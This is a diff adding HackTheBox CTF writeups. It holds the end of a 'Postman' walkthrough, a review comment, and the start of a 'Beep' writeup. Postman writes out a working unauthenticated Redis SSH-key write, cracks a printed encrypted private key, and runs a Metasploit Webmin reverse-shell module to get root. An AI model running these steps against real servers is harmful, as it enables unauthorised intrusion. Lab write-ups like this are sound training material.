+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: The Cyber Geek's Personal Website
+ 6379/tcp open redis Redis key-value store 4.0.9
+ 10000/tcp open http MiniServ 1.910 (Webmin httpd)
+ |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 36.79 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up a Redis 4.0.x instance running on port 6379
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → searchsploit redis 4
+ ------------------------------------------------------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------------------------------------------ ---------------------------------
+ Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation | windows/local/45244.txt
+ Redis - Replication Code Execution (Metasploit) | linux/remote/48272.rb
+ Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit) | linux/remote/47195.rb
+ Redis 5.0 - Denial of Service | linux/dos/44908.txt
+ Redis-cli <****5.0 - Buffer Overflow (PoC) | linux/local/44904.py
+ ------------------------------------------------------------------------------------------ ---------------------------------
+ Shellcodes: No Results
+
+As you can see, there are a few exploits available for redis 4.0.x and one of them is an unauthenticated command execxution and filewrites. So let's test that with redis-cli:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → sudo apt install redis -y
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → redis-cli -h 10.10.10.160
+ 10.10.10.160:6379> CONFIG GET *
+ 1) "dbfilename"
+ 2) "dump.rdb"
+ 3) "requirepass"
+ 4) ""
+ 5) "masterauth"
+ 6) ""
+ 7) "cluster-announce-ip"
+ 8) ""
+ 9) "unixsocket"
+ 10) ""
+ 11) "logfile"
+ 12) "/var/log/redis/redis-server.log"
+ 13) "pidfile"
+ 14) "/var/run/redis/redis-server.pid"
+ [...]
+
+
+Here we see that the default folder for redis seems to be /var/lib/redis, so we're going to check if the redis user has SSH authentication configured by checking for a .ssh folder:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → redis-cli -h 10.10.10.160
+
+ 10.10.10.160:6379> CONFIG GET dir
+ 1) "dir"
+ 2) "/var/lib/redis"
+
+ 10.10.10.160:6379> CONFIG SET dir /var/lib/redis/idontexist/
+ (error) ERR Changing directory: No such file or directory
+
+ 10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh/
+ OK
+
+
+
+So here we see that a .ssh folder does exist in redis' home directory, let's write our public SSH key to it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → ssh-keygen -t ed25519
+ Generating public/private ed25519 key pair.
+ Enter file in which to save the key (/home/nothing/.ssh/id_ed25519):
+ Enter passphrase (empty for no passphrase):
+ Enter same passphrase again:
+ Your identification has been saved in /home/nothing/.ssh/id_ed25519
+ Your public key has been saved in /home/nothing/.ssh/id_ed25519.pub
+ The key fingerprint is:
+ SHA256:WUW671jwTAkg4RGKPvDZ4twbg6pWVynYTDS/HaTqbE0 nothing@nowhere
+ The key's randomart image is:
+ +--[ED25519 256]--+
+ | .o=o.. .o |
+ | . +ooo. o |
+ |. . * .o..+ |
+ | + + +.ooo.o . |
+ | * ..oES.o o |
+ | o *o.o * |
+ | = =+ . = |
+ | o .+ + |
+ |= . . . |
+ +----[SHA256]-----+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → cat ~/.ssh/id_ed25519.pub
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → (echo -e "\n\n";cat ~/.ssh/id_ed25519.pub;echo -e "\n\n") > pubkey.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → cat pubkey.txt
+
+
+
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → cat pubkey.txt| redis-cli -h 10.10.10.160 -x set ssh_key
+ OK
+
+
+
+Here you can see we made sure that the public key had newline characters on either side, that is because if we didn't, redis would add our pubkey onto another, without jumping to a newline, obviously it wouldn't work, then we proceed:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → redis-cli -h 10.10.10.160
+
+ 10.10.10.160:6379> get ssh_key
+ "\n\n\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere\n\n\n\n"
+
+ 10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
+ OK
+
+ 10.10.10.160:6379> CONFIG SET dbfilename authorized_keys
+ OK
+
+ 10.10.10.160:6379> save
+ OK
+
+ 10.10.10.160:6379> exit
+
+
+
+Once that's done, simply ssh as the redis user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → ssh redis@10.10.10.160
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+ Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
+
+ redis@Postman:~$ id
+ uid=107(redis) gid=114(redis) groups=114(redis)
+
+ redis@Postman:~$
+
+
+
+Now that we have a ssh access to the box as the redis user, we're going to enumerate the box, to do so we can use the old fashioned unix-privesc-check or we can use a newer solution called 'LinPEAS', i'm going to use it for the other boxes aswell, so i'll clone the repository in my ~/Tools directory:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/Tools]
+ → git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
+ Cloning into 'privilege-escalation-awesome-scripts-suite'...
+ remote: Enumerating objects: 5452, done.
+ remote: Counting objects: 100% (239/239), done.
+ remote: Compressing objects: 100% (149/149), done.
+ remote: Total 5452 (delta 139), reused 132 (delta 85), pack-reused 5213
+ Receiving objects: 100% (5452/5452), 18.72 MiB | 3.94 MiB/s, done.
+ Resolving deltas: 100% (3250/3250), done.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/Tools]
+ → cd ~/HTB/Postman
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → sudo updatedb ; locate linpeas.sh
+ [sudo] password for nothing:
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → cp $(locate linpeas.sh) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K May 25 08:52 linpeas.sh
+
+
+
+Now let's transfer the file onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+
+Then download the script onto the box, you can either put it in **/tmp** or **/dev/shm** :
+
+
+ redis@Postman:~$ wget http://10.10.14.13:9090/linpeas.sh -O /dev/shm/peas.sh
+ --2021-05-25 08:03:20-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/dev/shm/peas.sh’
+
+ /dev/shm/peas.sh 100%[=================================================================================================================================================>] 333.85K 700KB/s in 0.5s
+
+ 2021-05-25 08:03:20 (700 KB/s) - ‘/dev/shm/peas.sh’ saved [341863/341863]
+
+ redis@Postman:~$ chmod +x /dev/shm/peas.sh
+ redis@Postman:~$ /dev/shm/peas.sh
+
+
+
+` 
+
+linpeas.sh's output is quite massive so here's the important parts, if you're using tmux you can search for the output itself like this **CTRL+B PgUp, CTRL+S 'ssh files'** :
+
+
+
+So Peas found an id_rsa.bak file in the **/opt** folder:
+
+
+ redis@Postman:~$ cat /opt/id_rsa.bak
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
+
+ JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
+ cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
+ 7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
+ cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
+ 1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
+ EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
+ UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
+ Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
+ t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
+ 5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
+ P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
+ jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
+ SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
+ l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
+ 0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
+ S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
+ hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
+ Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
+ XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
+ b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
+ WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
+ KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
+ npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
+ VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
+ X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
+ -----END RSA PRIVATE KEY-----
+
+
+As the title suggests, this is an encrypted private key file, so let's crack it with rockyou.txt using john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
+ → sudo gunzip rockyou.txt.gz
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
+ → ls -lash rockyou.txt
+ 134M -rw-r--r-- 1 root root 134M Jul 17 2019 rockyou.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
+ → cd ~/HTB/Postman
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → vim pkey
+
+
+
+Then we convert the private key to a hash with ssh2john.py and crack it with john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → locate ssh2john.py
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → /usr/share/john/ssh2john.py pkey > hash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
+ Created directory: /home/nothing/.john
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
+ Cost 2 (iteration count) is 2 for all loaded hashes
+ Node numbers 1-4 of 4 (fork)
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ computer2008 (pkey)
+ 2 1g 0:00:00:05 DONE (2021-05-25 09:11) 0.1848g/s 662739p/s 662739c/s 662739C/sabygurl69
+ 3 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 661514p/s 661514c/s 661514C/sa6_123
+ 4 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 660302p/s 660302c/s 660302C/s *7¡Vamos!
+ 1 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 660299p/s 660299c/s 660299C/sie168
+ Waiting for 3 children to terminate
+ Session completed
+
+
+
+And we found the password computer2008. but the question is for which user is this for ? We can look at it from either /home or /etc/passwd:
+
+
+ redis@Postman:~$ ls -lash /home
+ total 12K
+ 4.0K drwxr-xr-x 3 root root 4.0K Sep 11 2019 .
+ 4.0K drwxr-xr-x 22 root root 4.0K Sep 30 2020 ..
+ 4.0K drwxr-xr-x 6 Matt Matt 4.0K Sep 11 2019 Matt
+
+ redis@Postman:~$ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
+ redis:x:107:114::/var/lib/redis:/bin/bash
+
+
+
+Here we see that the Matt user has a home directory, and a valid bash shell. So let's get to the user using sudo:
+
+
+ redis@Postman:~$ su Matt
+ Password:
+ Matt@Postman:/var/lib/redis$ id
+ uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
+ Matt@Postman:/var/lib/redis$ cd ~
+ Matt@Postman:~$ cat user.txt
+ 23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the Matt user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now we need to find a way to get root on this box, first instinct tells us to check sudo -l:
+
+
+ Matt@Postman:~$ sudo -l
+ [sudo] password for Matt:
+ Sorry, user Matt may not run sudo on Postman.
+
+
+
+But that doesn't help us. Nor does anything else on this user, this is a bit of a rabbithole. Let's move onto the next thing our nmap scan picked up, the webmin service on port 10000
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → curl http://10.10.10.160:10000/
+
+
+ # Error - Document follows
+
+
+
+
+ This web server is running in SSL mode. Try the URL instead.
+
+
+
+
+
+
+So let's check it in https instead, we login as the Matt user with his password computer2008:
+
+
+
+
+
+
+ Matt@Postman:~$ cd /etc/webmin/
+
+ Matt@Postman:/etc/webmin$ cat version
+ 1.910
+
+
+
+So here's our hint, this is an outdated webmin version, so let's check what exploits we can use on it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → searchsploit webmin 1.9
+ ------------------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------ ---------------------------------
+ Webmin 1.900 - Remote Command Execution (Metasploit) | cgi/remote/46201.rb
+ Webmin 1.910 - 'Package Updates' Remote Command Execu | linux/remote/46984.rb
+ Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh
+ Webmin 1.920 - Unauthenticated Remote Code Execution | linux/remote/47230.rb
+ Webmin 1.962 - 'Package Updates' Escape Bypass RCE (M | linux/webapps/49318.rb
+ Webmin <****1.290 / Usermin <****1.220 - Arbitrary File Dis | multiple/remote/1997.php
+ Webmin < ****1.290 / Usermin < ****1.220 - Arbitrary File Dis | multiple/remote/2017.pl
+ Webmin < ****1.920 - 'rpc.cgi' Remote Code Execution (Met | linux/webapps/47330.rb
+ ------------------------------------------------------ ---------------------------------
+ Shellcodes: No Results
+
+So basically we can pick one of these, or we can make use of this proof of concept [here](https://github.com/KyleV98/Webmin-1.910-Exploit):
+
+TLDR we can get a RCE using burpsuite because the package updater is vulnerable to command injections through the **u** POST parameter. If you click on **System** on the panel to the left, then click on **Software Package Updates** , you can turn on Burpsuite to intercept, and then just click **Update Selected Packages:** So let's use metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → msfconsole
+
+
+ Metasploit Park, System Security Interface
+ Version 4.0.5, Alpha E
+ Ready...
+ > access security
+ access: PERMISSION DENIED.
+ > access security grid
+ access: PERMISSION DENIED.
+ > access main security grid
+ access: PERMISSION DENIED....and...
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+
+
+ =[ metasploit v6.0.44-dev ]
+ + -- --=[ 2131 exploits - 1139 auxiliary - 363 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: You can use help to view all
+ available commands
+
+ msf6 > search webmin
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
+ 1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
+ 2 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
+ 3 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
+ 4 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
+ 5 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
+
+
+ Interact with a module by name or index. For example info 5, use 5 or use exploit/linux/http/webmin_backdoor
+
+ msf6 > use 2
+
+
+
+We're going to use the RCE module:
+
+
+ msf6 > use 2
+ [*] Using configured payload cmd/unix/reverse_perl
+ msf6 exploit(linux/http/webmin_packageup_rce) > show options
+
+ Module options (exploit/linux/http/webmin_packageup_rce):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASSWORD yes Webmin Password
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 10000 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Base path for Webmin application
+ USERNAME yes Webmin Username
+ VHOST no HTTP server virtual host
+
+
+ Payload options (cmd/unix/reverse_perl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Webmin <= 1.910
+
+
+
+We need to set the LHOST, RHOST, SSL, USERNAME and PASSWORD options before running the exploit:
+
+
+ msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST tun0
+ LHOST => 10.10.14.13
+ msf6 exploit(linux/http/webmin_packageup_rce) > set RHOST 10.10.10.160
+ RHOST => 10.10.10.160
+ msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
+ [!] Changing the SSL option's value may require changing RPORT!
+ SSL => true
+ msf6 exploit(linux/http/webmin_packageup_rce) > run
+
+ [-] Exploit failed: One or more options failed to validate: USERNAME, PASSWORD.
+ [*] Exploit completed, but no session was created.
+ msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
+ USERNAME => Matt
+ msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
+ PASSWORD => computer2008
+ msf6 exploit(linux/http/webmin_packageup_rce) > run
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
+ [+] Session cookie: 4cc0c13f51b9e777f7a9e0cdc9a93277
+ [*] Attempting to execute the payload...
+ [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.160:49564) at 2021-05-25 09:56:39 +0200
+
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+ cat /root/root.txt
+ 3aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
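Review bot: the step introduced with "So let's get to the user using sudo:" actually runs `su Matt` with the cracked passphrase, not sudo, and `sudo -l` for Matt is shown failing a few lines later, so the sentence should say `su`. The Webmin section also stops short: "you can turn on Burpsuite to intercept, and then just click **Update Selected Packages:** So let's use metasploit:" describes a manual route that is never shown, so either finish that walkthrough or cut it and go straight to the module. Several lines carry markdown residue that will render literally: `Redis-cli <****5.0 - Buffer Overflow (PoC)` and `Webmin <****1.290 / Usermin <****1.220` should read `<`, the lone `` ` `` line after `/dev/shm/peas.sh` and the empty "Here we can see the progress graph :" are leftovers from dropped images (the linpeas "ssh files" hit the text refers to is therefore not visible either), and "execxution" is a typo. Finally, the root cause is on the page but never named: `3) "requirepass"` / `4) ""` on a Redis instance reachable on 6379 from the network, with `CONFIG SET dir` and `CONFIG SET dbfilename` accepted, is the misconfiguration the whole user-access section depends on; one sentence stating that (and that binding to localhost, setting `requirepass`, or renaming/disabling `CONFIG` closes it) would turn the sequence into a lesson rather than a recipe.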
diff --git a/Easy/4.md b/Easy/4.md
new file mode 100644
index 0000000..51af50c
--- /dev/null
+++ b/Easy/4.md
@@ -0,0 +1,308 @@
+# Beep Writeup
+
+
+
+## Introduction :
+
+Beep is an easy Linux box which was released back in March 2017. It features multiple Local File Inclusion Vulnerabilities.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions on the ports that we might find interesting.
+
+
+ λ nihilist [~] → nmap 10.10.10.7
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 11:47 CET
+ Nmap scan report for 10.10.10.7
+ Host is up (0.075s latency).
+ Not shown: 988 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 25/tcp open smtp
+ 80/tcp open http
+ 110/tcp open pop3
+ 111/tcp open rpcbind
+ 143/tcp open imap
+ 443/tcp open https
+ 993/tcp open imaps
+ 995/tcp open pop3s
+ 3306/tcp open mysql
+ 4445/tcp open upnotifyp
+ 10000/tcp open snet-sensor-mgmt
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
+
+
+
+There are alot of opened ports on this machine, Let's use the -sC and -sV flags on the ports 80 and 10000 to get a few more details.
+
+
+ λ nihilist [~] → nmap -sC -sV 10.10.10.7 -p80,10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 11:50 CET
+ Nmap scan report for 10.10.10.7
+ Host is up (0.071s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.2.3
+ |_http-server-header: Apache/2.2.3 (CentOS)
+ |_http-title: Did not follow redirect to https://10.10.10.7/
+ |_https-redirect: ERROR: Script execution failed (use -d to debug)
+ 10000/tcp open http MiniServ 1.570 (Webmin httpd)
+ |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
+ Service Info: Host: 127.0.0.1
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 37.64 seconds
+
+
+looking at the results, we see that we are dealing with Miniserv 1.570 and Apache 2.2.3 running on CentOS. Let's fire up our web browser to see what we are dealing with, at both the 80 and 10000th port.
+
+## **Part 2 : Getting User Access**
+
+We see that port 80 is giving us Elastix login page,
+
+
+
+As for the port 10000, it is giving us a webmin login page as it was mentionned in the previous nmap result.
+
+ We will now check for available exploits for both the Elastix and the Webmin Services. We will be using the **Searchsploit** command for that matter :
+
+
+ λ nihilist [~] → searchsploit webmin
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | exploits/cgi/webapps/23535.txt
+ Webmin - Brute Force / Command Execution | exploits/multiple/remote/705.pl
+ Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | exploits/linux/remote/22275.pl
+ Webmin 0.x - 'RPC' Privilege Escalation | exploits/linux/remote/21765.pl
+ Webmin 0.x - Code Input Validation | exploits/linux/local/21348.txt
+ Webmin 1.5 - Brute Force / Command Execution | exploits/multiple/remote/746.pl
+ Webmin 1.5 - Web Brute Force (CGI) | exploits/multiple/remote/745.pl
+ Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit) | exploits/unix/remote/21851.rb
+ Webmin 1.850 - Multiple Vulnerabilities | exploits/cgi/webapps/42989.txt
+ Webmin 1.900 - Remote Command Execution (Metasploit) | exploits/cgi/remote/46201.rb
+ Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb
+ Webmin 1.920 - Remote Code Execution | exploits/linux/webapps/47293.sh
+ Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) | exploits/linux/remote/47230.rb
+ Webmin 1.x - HTML Email Command Execution | exploits/cgi/webapps/24574.txt
+ Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP) | exploits/multiple/remote/1997.php
+ Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl) | exploits/multiple/remote/2017.pl
+ phpMyWebmin 1.0 - 'target' Remote File Inclusion | exploits/php/webapps/2462.txt
+ phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | exploits/php/webapps/2451.txt
+ **webmin 0.91 - Directory Traversal | exploits/cgi/remote/21183.txt**
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+ nihilist [~] → searchsploit elastix
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
+ Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
+ Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt
+ **Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl**
+ Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
+ Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
+ FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+
+So we have a server here which is running Elastix on port 80 (http), let's see if we can list directories using a command like gobuster. Just to show another tool for this example, we'll use Dirbuster, which goes by the syntax "dirb http://10.10.10.7:80/"
+
+
+ λ nihilist [~] → dirb http://10.10.10.7:80/
+
+
+Dirbuster just found the vtigercm page, which is giving us yet another login page to work with. Fortunately for us vtigercrm is vulnerable to Local File Inclusion as displayed below in the searchsploit command output.
+
+
+ λ nihilist [~] → searchsploit vtiger
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Vtiger - 'Install' Remote Command Execution (Metasploit) | exploits/php/remote/32794.rb
+ Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit) | exploits/php/webapps/44379.rb
+ Vtiger CRM 7.1.0 - Remote Code Execution | exploits/php/webapps/46065.py
+ vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions | exploits/php/webapps/2508.txt
+ vTiger CRM 4.2 - SQL Injection | exploits/php/webapps/26586.txt
+ vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting | exploits/php/webapps/26584.txt
+ vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting | exploits/php/webapps/26585.txt
